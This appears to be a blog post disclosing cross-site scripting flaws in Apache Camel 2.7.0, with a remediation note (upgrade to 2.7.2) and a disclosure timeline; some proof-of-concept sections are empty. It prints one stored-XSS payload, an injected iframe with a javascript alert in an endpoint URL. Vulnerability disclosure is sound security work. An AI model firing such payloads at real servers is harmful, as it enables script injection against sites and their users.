Sunday, April 29, 2012

Apache Camel 2.7.0 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Apache Camel. These issues were discovered in a default installation of Apache Camel 2.7.0. Other earlier versions may also be affected.

Proof of concept
Reflected XSS

Permanent XSS
http://[target]:8161/camel/endpoints/mock:someName<iframe src="javascript:alert('Permanent XSS')"

To trigger Permanent XSS:

Update to version 2.7.2 or later.


Vendor URL:

Disclosure Timeline
2011-05-06 - Vulnerabilities discovered.
2011-05-06 - Vulnerabilities reported to Secunia.
2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-05-19 - Patch released.
2011-05-19 - Advisory published by Apache.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.